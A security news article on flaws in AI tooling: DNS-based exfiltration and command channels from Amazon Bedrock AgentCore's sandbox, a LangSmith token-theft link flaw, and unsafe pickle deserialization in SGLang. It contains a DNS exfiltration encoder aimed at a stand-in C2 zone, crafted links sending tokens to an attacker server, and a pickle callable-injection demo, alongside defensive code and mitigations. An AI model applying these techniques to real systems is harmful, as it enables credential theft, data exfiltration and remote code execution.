Cybersecurity researchers have revealed details of a new method of exfiltrating sensitive data from artificial intelligence (AI) code execution environments using Domain Name System (DNS) queries.
In a report published Monday, BeyondTrust revealed that the sandbox mode of the Amazon Bedrock AgentCore code interpreter allows outbound DNS queries that an attacker could use to enable an interactive shell and bypass network isolation. This issue, which does not have a CVE identifier, holds a CVSS score of 7.5 out of 10.0.
Amazon Bedrock AgentCore Code Interpreter is a fully managed service that enables AI agents to securely execute code in isolated sandbox environments, such that agentic workloads cannot access external systems. It was launched by Amazon in August 2025.
The fact that the service allows DNS queries despite a “no network access” configuration “could allow threat actors to establish command-and-control channels and data exfiltration over DNS in some scenarios, bypassing expected network isolation controls,” said Kinnard McQuade, chief security architect at BeyondTrust.
In an experimental attack scenario, a threat actor could abuse this behavior to establish a bidirectional communication channel over DNS queries and responses, obtain an interactive reverse shell, execute commands, and exfiltrate sensitive information via DNS queries, provided the interpreter's IAM role has permissions to access AWS resources such as an S3 bucket that stores that data.
Additionally, the DNS communication mechanism can be abused to deliver additional payloads fed to the code interpreter, allowing it to poll DNS command-and-control (C2) servers for commands stored in DNS A records, execute them, and return results via DNS subdomain queries.
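The exfiltration half of this channel works by packing stolen bytes into the subdomain labels of queries for an attacker-controlled zone; the sandbox's recursive resolver then forwards that data to the attacker's authoritative nameserver even when all other outbound traffic is blocked. A minimal sketch of the encoding step (the zone `c2.example.com` and the chunking scheme are illustrative, not taken from BeyondTrust's report):

```python
import binascii

MAX_LABEL = 63  # DNS limits each label to 63 characters

def encode_exfil_queries(data: bytes, zone: str = "c2.example.com") -> list[str]:
    """Hex-encode data, split it into label-sized chunks, and build
    the hostnames an exfiltration client would resolve."""
    hex_data = binascii.hexlify(data).decode()
    chunks = [hex_data[i:i + MAX_LABEL] for i in range(0, len(hex_data), MAX_LABEL)]
    # A sequence-number label lets the attacker's server reassemble
    # the chunks in order.
    return [f"{seq}.{chunk}.{zone}" for seq, chunk in enumerate(chunks)]

# Resolving each name (e.g. with socket.gethostbyname) would cause the
# resolver to forward the encoded data to the zone's authoritative
# server -- no direct outbound connection from the sandbox is needed.
for name in encode_exfil_queries(b"example-secret"):
    print(name)
```

The C2 direction simply runs in reverse: the server encodes commands in the DNS responses (such as A records) that come back for these lookups.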
It’s worth noting that the code interpreter requires the IAM role to access AWS resources. However, a simple oversight can lead to a service being assigned a highly privileged role, giving it broad permissions to access sensitive data.
“This research demonstrates how DNS resolution can weaken the network isolation guarantees of sandboxed code interpreters,” BeyondTrust said. “Using this method, attackers can exfiltrate sensitive data from AWS resources accessible through the code interpreter’s IAM role, potentially causing downtime, deleted infrastructure, or a breach of sensitive customer information.”
Following responsible disclosure in September 2025, Amazon determined this to be intended functionality rather than a defect, urging customers to use VPC mode instead of sandbox mode for complete network isolation. The tech giant also recommends the use of a DNS firewall to filter outbound DNS traffic.
“To protect sensitive workloads, administrators should inventory all active AgentCore Code Interpreter instances and immediately migrate those handling critical data from sandbox mode to VPC mode,” said Jason Sorocco, senior partner at Sectigo.
“Operating within a VPC provides the necessary infrastructure for strong network isolation, allowing teams to implement strict security groups, network ACLs, and Route 53 Resolver DNS firewalls to monitor and block unauthorized DNS resolution. Finally, security teams should rigorously audit the IAM roles associated with these interpreters, strictly following the principle of least privilege to limit the blast radius of any potential compromise.”
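An audit of the over-privileged roles described above can start by flagging wildcard grants in a role's policy documents (the documents themselves could be fetched with boto3's IAM APIs, e.g. `list_attached_role_policies`; the flagging logic below needs no AWS access and is a hypothetical sketch, not an official tool):

```python
def find_broad_statements(policy_doc: dict) -> list[dict]:
    """Return Allow statements whose Action or Resource uses a
    wildcard -- candidates for tightening under least privilege."""
    flagged = []
    statements = policy_doc.get("Statement", [])
    if isinstance(statements, dict):  # a lone statement may not be wrapped in a list
        statements = [statements]
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        resources = stmt.get("Resource", [])
        actions = [actions] if isinstance(actions, str) else actions
        resources = [resources] if isinstance(resources, str) else resources
        # "s3:*" or "*" actions, or a "*" resource, grant far more than
        # a code interpreter workload should normally need.
        if any(a == "*" or a.endswith(":*") for a in actions) or "*" in resources:
            flagged.append(stmt)
    return flagged

risky = {"Version": "2012-10-17",
         "Statement": [{"Effect": "Allow", "Action": "s3:*", "Resource": "*"}]}
print(find_broad_statements(risky))  # the s3:* statement is flagged
```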
LangSmith vulnerable to account takeover flaw
The disclosure comes after Miggo Security disclosed a high-severity security flaw in LangSmith (CVE-2026-25750, CVSS score: 8.5), putting users at risk of potential token theft and account takeover. The issue, which affects both self-hosted and cloud deployments, has been addressed in LangSmith version 0.12.71, released in December 2025.
This vulnerability is described as a case of URL parameter injection resulting from a lack of validation on base URL parameters, which enables an attacker to steal a signed-in user’s bearer token, user ID, and workspace ID transmitted to a server under their control via social engineering techniques, such as tricking a victim into clicking a specially crafted link like the one below –
- Cloud – smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
- Self-hosted – /studio/?baseUrl=https://attacker-server.com
Successful exploitation of the vulnerability could allow an attacker to gain unauthorized access to an AI agent’s trace history, as well as expose internal SQL queries, CRM customer records, or proprietary source code by reviewing tool calls.
“A logged-in LangSmith user could be compromised simply by visiting an attacker-controlled site or clicking on a malicious link,” said Miggo researchers Liad Eliyahu and Eliana Vuijsje.
“This vulnerability is a reminder that AI observability platforms are now critical infrastructure. As these tools prioritize developer flexibility, they often inadvertently sidestep security guardrails. The risk is heightened because, unlike ‘traditional’ software, AI agents have deep access to internal data sources and third-party services.”
Unsafe pickle deserialization flaws in SGLang
Security vulnerabilities have also been identified in SGLang, a popular open-source framework for serving large language models and multimodal AI models, which, if successfully exploited, could trigger unsafe pickle deserialization, potentially resulting in remote code execution.
The vulnerabilities, discovered by Orca security researcher Igor Stepansky, had not been fixed at the time of writing. A brief description of the flaws is as follows –
- CVE-2026-3059 (CVSS Score: 9.8) – An unauthenticated remote code execution vulnerability through the ZeroMQ (aka ZMQ) broker, which deserializes untrusted data using pickle.loads() without authentication. This affects the multimodal generation module of SGLang.
- CVE-2026-3060 (CVSS Score: 9.8) – An unauthenticated remote code execution vulnerability through the disaggregation module, which deserializes untrusted data using pickle.loads() without authentication. This affects SGLang’s encoder parallel disaggregation mechanism.
- CVE-2026-3989 (CVSS Score: 7.8) – Use of the insecure pickle.load() function without validation in SGLang’s “replay_request_dump.py”, which can be exploited by supplying a malicious pickle file.
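The underlying danger is that `pickle.loads()` will resolve and invoke any callable named in the stream, so a network-reachable deserializer is effectively an RCE endpoint. One common mitigation (a generic sketch, not SGLang's patch) is to subclass `pickle.Unpickler` and refuse everything outside an explicit allowlist of globals:

```python
import io
import pickle

class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only a fixed set of harmless globals during unpickling."""
    ALLOWED = {("builtins", "dict"), ("builtins", "list"),
               ("builtins", "str"), ("builtins", "int")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        # Anything else -- os.system, subprocess.Popen, etc. -- is refused
        # instead of being imported and called.
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

# Plain container data still round-trips...
assert restricted_loads(pickle.dumps({"ok": [1, 2]})) == {"ok": [1, 2]}
# ...but a stream naming a non-allowlisted callable raises UnpicklingError.
```

Even with such an allowlist, the Python documentation's standing advice applies: never unpickle data from an untrusted or unauthenticated source.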
“The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features on the network,” Stepansky said. “The third involves unsafe deserialization in the crash dump replay utility.”
In a coordinated advisory, the CERT Coordination Center (CERT/CC) said that SGLang is vulnerable to CVE-2026-3059 when the multimodal generation system is enabled and to CVE-2026-3060 when the encoder parallel disaggregation system is enabled.
“If either condition is met and an attacker knows the TCP port on which the ZMQ broker is listening and can send requests to the server, they can exploit the vulnerability by sending a malicious pickle file to the broker, which will then deserialize it,” CERT/CC said.
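The exploit primitive CERT/CC describes is a standard pickle technique: a crafted stream can name an arbitrary callable and its arguments via `__reduce__`, and the victim's `pickle.loads()` invokes it during deserialization. A harmless demonstration, substituting `str.upper` for something like `os.system`:

```python
import pickle

class Payload:
    """When pickled, serializes as 'call str.upper("pwned")'
    rather than as ordinary object state."""
    def __reduce__(self):
        return (str.upper, ("pwned",))

malicious_bytes = pickle.dumps(Payload())

# The deserializer executes the attacker's chosen call -- which is why
# an unauthenticated ZMQ endpoint feeding network input to
# pickle.loads() amounts to remote code execution.
result = pickle.loads(malicious_bytes)
print(result)  # PWNED
```

Note that the `Payload` class never needs to exist on the victim's side; the pickle stream itself carries the callable's name and arguments.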
Users of SGLang are advised to restrict access to the service interfaces and ensure they are not exposed to untrusted networks. It is also advised to implement adequate network segmentation and access controls to prevent unauthorized interactions with ZeroMQ endpoints.
Although there is no evidence that these vulnerabilities have been exploited in the wild, it is important to monitor for unexpected inbound TCP connections to the ZeroMQ broker port, unexpected child processes spawned by the sglang Python process, file creation in unusual locations by the sglang process, and outbound connections from the sglang process to unexpected destinations.